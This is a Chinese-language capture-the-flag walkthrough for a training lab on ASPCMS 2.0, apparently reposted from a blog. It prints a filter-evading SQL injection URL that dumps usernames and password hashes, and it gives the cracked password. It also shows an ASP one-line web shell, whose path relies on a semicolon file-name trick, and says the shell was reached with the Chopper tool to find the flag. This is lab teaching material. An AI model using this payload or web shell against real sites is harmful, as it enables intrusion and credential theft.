墨者學院_CMS系統漏洞分析溯源(第4題)
阿新 • • 發佈:2020-10-12
靶場:
https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe
背景介紹
ASPCMS是完全開源的一套CMS建站系統,主要面向企業進行快速的建造簡潔,高效,易用,安全的公司企業網站,一般的開發人員就能夠使用本系統以最低的成本、最少的人力投入在最短的時間內架設一個功能齊全、效能優異的公司企業網站。ASPCMS是基於ASP+Access(sql2000)開發的網站內容管理系統。
實訓目標
1.學習登入繞過、cookie欺騙的相關知識;
2.熟悉火狐外掛cookies Manager使用;
3.對程式碼的相關知識瞭解;
解題方向
程式碼審計漏洞,cookie偽造繞過身份鑑別
解題思路:
1、開啟網址,檢視頁面原始碼,發現目標使用aspcms2.0
2、百度aspcms2.0,發現存在注入漏洞,利用payload
/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user
獲取使用者名稱和密碼(密碼是MD5加密後的)
解密:4rfv3edc2wsx1qaz
3、使用使用者名稱密碼登入
4、發現一個介面風格位置,有一個1.asp;.html文字資訊,而裡面也已經寫好了asp一句話木馬
<%eval request("chopper")%>
5、菜刀連線,在C盤下找到key
/Templates/green/html/1.asp;.html